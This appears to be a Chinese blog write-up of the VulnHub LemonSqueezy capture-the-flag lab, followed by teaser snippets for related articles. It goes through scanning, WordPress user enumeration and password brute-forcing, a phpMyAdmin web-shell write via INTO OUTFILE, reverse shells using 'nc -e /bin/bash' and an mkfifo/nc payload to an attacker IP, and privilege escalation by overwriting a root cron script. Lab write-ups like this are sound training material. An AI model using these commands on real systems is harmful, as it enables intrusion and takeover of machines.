vulnhub之LemonSqueezy的实践

VSole2023-06-12 09:20:24

今天实践的是vulnhub的LemonSqueezy镜像,

下载地址,https://download.vulnhub.com/lemonsqueezy/LemonSqueezy.7z,

用workstation打开,直接就在console上看到了靶机的地址,

做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.177.139,

有web服务,做一下目录暴破,dirb http://192.168.177.139,

获取到三个有用的url,

http://192.168.177.139/phpmyadmin

http://192.168.177.139/wordpress

http://192.168.177.139/wordpress/wp-admin

用wpscan扫描用户,

wpscan --url http://192.168.177.139/wordpress -e u,

获取到lemon和orange两个用户,

暴力破解orange用户的密码,

wpscan --url http://192.168.177.139/wordpress -U orange -P /usr/share/wordlists/rockyou.txt,

获取到密码,ginger,

用orange/ginger登录http://192.168.177.139/wordpress/wp-admin

获取到另一个密码,n0t1n@w0rdl1st!,

用orange/n0t1n@w0rdl1st!登录http://192.168.177.139/phpmyadmin,

新建一个数据表,注入一个web shell,

SELECT "" into outfile "/var/www/html/wordpress/shell.php",

验证一下webshell的效果,

http://192.168.177.139/wordpress/shell.php?cmd=whoami,

kali攻击机上开个反弹shell监听,nc -lvp 4444,

浏览器访问http://192.168.177.139/wordpress/shell.php?cmd=nc -e /bin/bash 192.168.177.138 4444,

获取到反弹shell,不是root,查看到有个root权限的定时程序,

构造另一个反弹shell脚本,

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.177.138 lport=8888 R,

mkfifo /tmp/rvrnj; nc 192.168.177.138 8888 0/tmp/rvrnj 2>&1; rm /tmp/rvrnj,

kali攻击机上重新开个反弹shell监听,nc -lvp 8888,

在靶机上给程序写入反弹shell脚本,

echo "mkfifo /tmp/rvrnj; nc 192.168.177.138 8888 0/tmp/rvrnj 2>&1; rm /tmp/rvrnj" > logrotate,

重新获取到反弹shell,这回是root,

shelltmp
本作品采用《CC 协议》,转载必须注明作者和本文链接
接着老毛病就犯了,上去就输入了个1查询接着输入了1’啧啧啧,这明显有SQL注入哇。果断掏出SQLMAP神器。结局很完美,不仅存在注入,还是DBA的权限。初步信息搜集既然拿到了shell,那么第一步肯定是信息搜集了。免杀shellcode完美上线这里我用的K8gege的 Ladon插件进行扫描内网得,主要扫描出来的结果格式比较好看。横向渗透&进一步信息搜集内网第一波那必须的是MS17-010了,这里我同样用K8gege的Ladon。
网安引领时代,弥天点亮未来 0x00序言在日常工作中,如果办公电脑或者个人PC有以下两个方面的异常行为
前言建议直接复制粘贴到笔记,或点赞收藏,因为时常会用到,这是整理的一些常见的反向shell和特权提升的笔记文档,红队成员必会!反向shell-备忘录 通常在获得远程代码执行之后,我们希望获得一些交互式访问—而不是发出单个命令获取单个回显或与 web shell 交互
反弹shell汇总
2021-07-28 10:01:11
反弹shell汇总
红队渗透项目之MinUv1
2022-07-05 21:13:22
红队渗透
描述SUID代表设置的用户ID,是一种Linux功能,允许用户在指定用户的许可下执行文件。
上述操作均在gitlab默认配置情况下,若漏洞利用无法复现可留言,一起讨论研究。
上周在先知社区看到@Xgstar师傅写的《SQLserver写Webshell总结-突破中文路径》文章中提到一个利用批处理写Webshell至中文路径的思路,但最后他并没有成功利用这个思路写入Webshell。 因为之前也写过这类场景的利用思路,所以就想对他提到的这个思路以及遇到的问题简单测试下,关于更多写Webshell至中文路径的思路可参考我之前写的《MSSQL高权限注入写马至中文路径》。
如果手工测试无果后再用代理手法扫描网站,必要的时候设置二级代理。什么站能扫什么站不能扫,心里一定要有点 b 数!浅蓝的渗透测试导图以及小工具这里有一个更加详细的导图,可以做一个大致的方向参考,跟着方向逐一测试, 期间也可以巩固基础。
VSole
网络安全专家